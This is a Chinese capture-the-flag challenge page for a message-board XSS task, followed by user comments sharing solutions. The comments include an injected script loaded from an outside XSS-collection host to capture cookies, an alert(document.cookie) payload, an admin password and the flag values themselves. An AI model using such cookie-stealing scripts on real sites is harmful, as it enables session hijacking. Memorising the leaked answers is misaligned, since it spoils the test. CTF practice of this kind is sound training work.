留言板WEB 未解决

分数: 10 金币: 3
题目作者: harry
一血奖励: 5金币
解  决: 3345
提  示: 题目无需登录后台!需要xss平台接收flag
描  述:
http协议需要http协议的xss平台
评论
问题小子 3年前

纯小白,这道题怎么做啊

回复 2

xcxy 3年前

用御剑工具扫描不出文件目录,直接xss平台代码插入就行了,也不用变形,能够收到cookie : flag=flag%7B5b10e075f4319e7f628f6813ca4a1904%7D,这个是url编码,解码就行了。题目应该是改了,太简单了

回复 0

32130262 3年前

我用xss.pt生成的脚本,放入留言框里,换了很多格式。还使用F12 console 里输入javascript:eval('window.s=document.createElement("script");window.s.src="https://0x.ax/o0fK";document.body.appendChild(window.s)'),xss

回复 0

Wjustice 3年前

复盘一下,直接上工具得出后台路径,然后插入图片xss,导出flag,估计是改了题,以前应该是还有个dp.sql文件。。。。。

回复 4

Amibaba 3年前

/admin.php登录后台,账号admin 密码 011be4d65feac1a8,控制台打cookie,alert(document.cookie)

回复 0

Cmy520CTF 3年前

链接后面加 /admin.php回车 账号admin 密码 011be4d65feac1a8 然后点击login得到 flag=flag%7Bce56da59371f9eec3569e6feca58eeff%7D 转成 flag{ce56da59371f9eec3569e6feca58eeff}就是答案

回复 0

嵌入式学的CTF 3年前

题改了,不需要后台也扫不到后台,只有一个管理员且无法注入,只能灵活XSS,而且服务器很慢耐心等待,我一直以为没反应改了半天pd

回复 0

sisa 3年前

dirmap、dirsearch、dirb都扫不出sql文件,看wp直接访问db.sql得到是The requested URL was not found on this server.真不知你们是怎么知道密码的?

回复 4

safeweb20 3年前

这道题通过dirsearch.py 扫描网址找到sql账号数据之后登录admin账户,通过xss注入可以找到flag, 管理员密码是011be4d65feac1a8 账户是admin xss可以使用<script>alert(document.cookie);</script>

回复 1

bigbox1 3年前

这个题有问题,管理员密码是011be4d65feac1a8,作者把那个文件删了应该是,那个登录框不是sql注入

回复 2

WriteUp

image
丶我亚索贼六

5 金币

评分(19)

解题动态

yinlin 攻破了该题 12小时前
念旧 攻破了该题 17小时前
Anonymous.. 攻破了该题 17小时前
admincon 攻破了该题 20小时前
粉红色的-毛 攻破了该题 2天前
一只十五 攻破了该题 3天前
xxsko 攻破了该题 3天前
aaaa1111 攻破了该题 3天前
thexx 攻破了该题 4天前
flag与她皆失 攻破了该题 6天前
3024769318 攻破了该题 7天前
xyjwkg 攻破了该题 8天前
Gcysnd 攻破了该题 8天前
shengood 攻破了该题 9天前
余生 攻破了该题 13天前
蟹不揉 攻破了该题 13天前
love_islet 攻破了该题 14天前
2333m 攻破了该题 15天前
echk 攻破了该题 16天前
edadsadw 攻破了该题 17天前
问题反馈